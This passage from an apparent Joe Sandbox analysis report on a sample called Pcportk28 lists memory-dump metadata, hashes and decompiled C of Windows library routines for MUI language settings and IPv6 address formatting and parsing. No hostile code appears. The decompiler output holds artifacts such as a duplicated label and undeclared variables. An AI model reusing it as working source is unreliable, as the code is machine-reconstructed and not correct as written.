                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 Memory Dump Source
                                                 • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                 Joe Sandbox IDA Plugin
                                                 • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                 Similarity
                                                 • API ID:
                                                 • String ID:
                                                 • API String ID:
                                                 • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                 • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                 • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                 • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                 Uniqueness

                                                 Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00878788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E00878460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E0085E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E0087718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E00878460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E0087718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E00878460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E00878460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E00878460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E0087718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E00852340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E0086E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E0085E2A8(_t322,  &_v68, _v16);
                                                								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E0086E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E0085E2A8(_t322,  &_v68, _t236);
                                                								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E0087718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E00852340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E0086E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E0085E2A8(_v12,  &_v68, _v16);
                                                							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E0086E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E0085E2A8(_t322,  &_v68, _t269);
                                                							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E0087718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E00852340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E0086E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E0085E2A8(_v12,  &_v68, _v16);
                                                						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E0086E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E0085E2A8(_t322,  &_v68, _t296);
                                                						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}
                                                0x0087892c
                                                0x0087892d
                                                0x00878930
                                                0x00878935
                                                0x0087893a
                                                0x00878b51
                                                0x00878940
                                                0x00878954
                                                0x00878954
                                                0x0087895a
                                                0x008c1b63
                                                0x00000000
                                                0x00878960
                                                0x00878969
                                                0x00878973
                                                0x00878976
                                                0x00878979
                                                0x0087897e
                                                0x00878981
                                                0x00878981
                                                0x00878986
                                                0x00000000
                                                0x00000000
                                                0x008c1b6e
                                                0x008c1b74
                                                0x008c1b7b
                                                0x008c1b8f
                                                0x008c1b91
                                                0x008c1b91
                                                0x008c1b99
                                                0x008c1b9c
                                                0x008c1ba2
                                                0x008c1ba2
                                                0x0087898c
                                                0x00878992
                                                0x00878999
                                                0x008789ad
                                                0x008c1ba8
                                                0x008c1ba8
                                                0x008789ad
                                                0x008789b6
                                                0x008789c8
                                                0x008789cd
                                                0x008789d0
                                                0x008789d0
                                                0x008789d6
                                                0x008789e8
                                                0x008789e8
                                                0x008789ed
                                                0x00000000
                                                0x008789ed
                                                0x0087895a
                                                0x0087883e
                                                0x00878841
                                                0x00878844
                                                0x00878845
                                                0x00878848
                                                0x0087884d
                                                0x00878852
                                                0x00878b49
                                                0x00878858
                                                0x0087886c
                                                0x0087886c
                                                0x00878872
                                                0x008c1b0e
                                                0x00000000
                                                0x00878878
                                                0x00878881
                                                0x0087888b
                                                0x0087888e
                                                0x00878891
                                                0x00878896
                                                0x00878899
                                                0x00878899
                                                0x0087889e
                                                0x00000000
                                                0x00000000
                                                0x008c1b21
                                                0x008c1b27
                                                0x008c1b2e
                                                0x008c1b42
                                                0x008c1b44
                                                0x008c1b44
                                                0x008c1b4c
                                                0x008c1b4f
                                                0x008c1b55
                                                0x008c1b55
                                                0x008788a4
                                                0x008788aa
                                                0x008788b1
                                                0x008788c5
                                                0x008c1b5b
                                                0x008c1b5b
                                                0x008788c5
                                                0x008788ce
                                                0x008788e0
                                                0x008788e5
                                                0x008788e8
                                                0x008788e8
                                                0x008788ee
                                                0x00878900
                                                0x00878900
                                                0x00878905
                                                0x00000000
                                                0x00878905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 008789FC
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00878914
                                                • Kernel-MUI-Number-Allowed, xrefs: 008787E6
                                                • WindowsExcludedProcs, xrefs: 008787C1
                                                • Kernel-MUI-Language-Allowed, xrefs: 00878827
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                • Instruction ID: 1c6edd887fdcd274270d59fabc44af375c0b1263074298959232ef17e080710c
                                                • Opcode Fuzzy Hash: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                • Instruction Fuzzy Hash: 30F1E4B2D00209EFCF15DF98C985AAEBBB9FB08304F14846AE505E7251EB34DA45DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 38%
                                                			E008913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _t71;
                                                				signed int _t78;
                                                				signed int _t86;
                                                				char _t90;
                                                				signed int _t91;
                                                				signed int _t96;
                                                				intOrPtr _t108;
                                                				signed int _t114;
                                                				void* _t115;
                                                				intOrPtr _t128;
                                                				intOrPtr* _t129;
                                                				void* _t130;
                                                
                                                				_t129 = _a4;
                                                				_t128 = _a8;
                                                				_t116 = 0;
                                                				_t71 = _t128 + 0x5c;
                                                				_v8 = 8;
                                                				_v20 = _t71;
                                                				if( *_t129 == 0) {
                                                					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                						if(_t96 != 0) {
                                                							L38:
                                                							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                								goto L5;
                                                							} else {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                								L36:
                                                								return _t128 + _t86 * 2;
                                                							}
                                                						}
                                                						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                						if(_t114 == 0) {
                                                							L33:
                                                							_t115 = 0x852926;
                                                							L35:
                                                							_push( *(_t129 + 0xf) & 0x000000ff);
                                                							_push( *(_t129 + 0xe) & 0x000000ff);
                                                							_push( *(_t129 + 0xd) & 0x000000ff);
                                                							_push( *(_t129 + 0xc) & 0x000000ff);
                                                							_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                							goto L36;
                                                						}
                                                						if(_t114 != 0xffff) {
                                                							_t116 = 0;
                                                							goto L38;
                                                						}
                                                						if(_t114 != 0) {
                                                							_t115 = 0x859cac;
                                                							goto L35;
                                                						}
                                                						goto L33;
                                                					}
                                                				} else {
                                                					L5:
                                                					_a8 = _t116;
                                                					_a4 = _t116;
                                                					_v12 = _t116;
                                                					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                						if( *(_t129 + 0xa) == 0xfe5e) {
                                                							_v8 = 6;
                                                						}
                                                					}
                                                					_t90 = _v8;
                                                					if(_t90 <= _t116) {
                                                						L11:
                                                						if(_a8 - _a4 <= 1) {
                                                							_a8 = _t116;
                                                							_a4 = _t116;
                                                						}
                                                						_t91 = 0;
                                                						if(_v8 <= _t116) {
                                                							L22:
                                                							if(_v8 < 8) {
                                                								_push( *(_t129 + 0xf) & 0x000000ff);
                                                								_push( *(_t129 + 0xe) & 0x000000ff);
                                                								_push( *(_t129 + 0xd) & 0x000000ff);
                                                								_t128 = _t128 + E00887707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                							}
                                                							return _t128;
                                                						} else {
                                                							L14:
                                                							L14:
                                                							if(_a4 > _t91 || _t91 >= _a8) {
                                                								if(_t91 != _t116 && _t91 != _a8) {
                                                									_push(":");
                                                									_push(_t71 - _t128 >> 1);
                                                									_push(_t128);
                                                									_t128 = _t128 + E00887707() * 2;
                                                									_t71 = _v20;
                                                									_t130 = _t130 + 0xc;
                                                								}
                                                								_t78 = E00887707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                								_t130 = _t130 + 0x10;
                                                							} else {
                                                								_push(L"::");
                                                								_push(_t71 - _t128 >> 1);
                                                								_push(_t128);
                                                								_t78 = E00887707();
                                                								_t130 = _t130 + 0xc;
                                                								_t91 = _a8 - 1;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							_t128 = _t128 + _t78 * 2;
                                                							_t71 = _v20;
                                                							if(_t91 >= _v8) {
                                                								goto L22;
                                                							}
                                                							_t116 = 0;
                                                							goto L14;
                                                						}
                                                					} else {
                                                						_t108 = 1;
                                                						_v16 = _t129;
                                                						_v24 = _t90;
                                                						do {
                                                							if( *_v16 == _t116) {
                                                								if(_t108 - _v12 > _a8 - _a4) {
                                                									_a4 = _v12;
                                                									_a8 = _t108;
                                                								}
                                                								_t116 = 0;
                                                							} else {
                                                								_v12 = _t108;
                                                							}
                                                							_v16 = _v16 + 2;
                                                							_t108 = _t108 + 1;
                                                							_t26 =  &_v24;
                                                							 *_t26 = _v24 - 1;
                                                						} while ( *_t26 != 0);
                                                						goto L11;
                                                					}
                                                				}
                                                			}

                                                (Disassembly view for E008913CB: only the instruction-address column survived extraction, covering 0x0089138e-0x008914ac and 0x008be8fd-0x008bea05; the instruction text is not on the page.)

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                • Instruction ID: a6fe69c3a6269f7ec4c6c29c1ca7d135ab1b205ff04bb15633e075aff73f63ab
                                                • Opcode Fuzzy Hash: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                • Instruction Fuzzy Hash: 6F612771908656AACF24EF5DC8848BEBBB6FF94301718C02DE4D6C7741D634AA44DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00890B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				void* _t108;
                                                				void* _t116;
                                                				char _t120;
                                                				short _t121;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				char _t132;
                                                				short _t133;
                                                				intOrPtr _t141;
                                                				signed int _t156;
                                                				signed int _t174;
                                                				intOrPtr _t177;
                                                				intOrPtr* _t179;
                                                				intOrPtr _t180;
                                                				void* _t183;
                                                
                                                				_t179 = _a4;
                                                				_t141 =  *_t179;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_v8 = 0;
                                                				_v24 = 0;
                                                				_v12 = 0;
                                                				_v32 = 0;
                                                				_v20 = 0;
                                                				if(_t141 == 0) {
                                                					L41:
                                                					 *_a8 = _t179;
                                                					_t180 = _v24;
                                                					if(_t180 != 0) {
                                                						if(_t180 != 3) {
                                                							goto L6;
                                                						}
                                                						_v8 = _v8 + 1;
                                                					}
                                                					_t174 = _v32;
                                                					if(_t174 == 0) {
                                                						if(_v8 == 7) {
                                                							goto L43;
                                                						}
                                                						goto L6;
                                                					}
                                                					L43:
                                                					if(_v16 != 1) {
                                                						if(_v16 != 2) {
                                                							goto L6;
                                                						}
                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                						L47:
                                                						if(_t174 != 0) {
                                                							E00868980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                							_t116 = 8;
                                                							L0085DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_t180 != 0) {
                                                						if(_v12 > 3) {
                                                							goto L6;
                                                						}
                                                						_t120 = E00890CFA(_v28, 0, 0xa);
                                                						_t183 = _t183 + 0xc;
                                                						if(_t120 > 0xff) {
                                                							goto L6;
                                                						}
                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                						goto L47;
                                                					}
                                                					if(_v12 > 4) {
                                                						goto L6;
                                                					}
                                                					_t121 = E00890CFA(_v28, _t180, 0x10);
                                                					_t183 = _t183 + 0xc;
                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                					goto L47;
                                                				} else {
                                                					while(1) {
                                                						_t123 = _v16;
                                                						if(_t123 == 0) {
                                                							goto L7;
                                                						}
                                                						_t108 = _t123 - 1;
                                                						if(_t108 != 0) {
                                                							goto L1;
                                                						}
                                                						_t178 = _t141;
                                                						if(E008906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                							if(E008906BA(_t135, _t178) == 0 || E00890A5B(_t136, _t178) == 0) {
                                                								if(_t141 != 0x3a) {
                                                									if(_t141 == 0x2e) {
                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                											goto L41;
                                                										} else {
                                                											_v24 = _v24 + 1;
                                                											L27:
                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E00890CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E00890CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
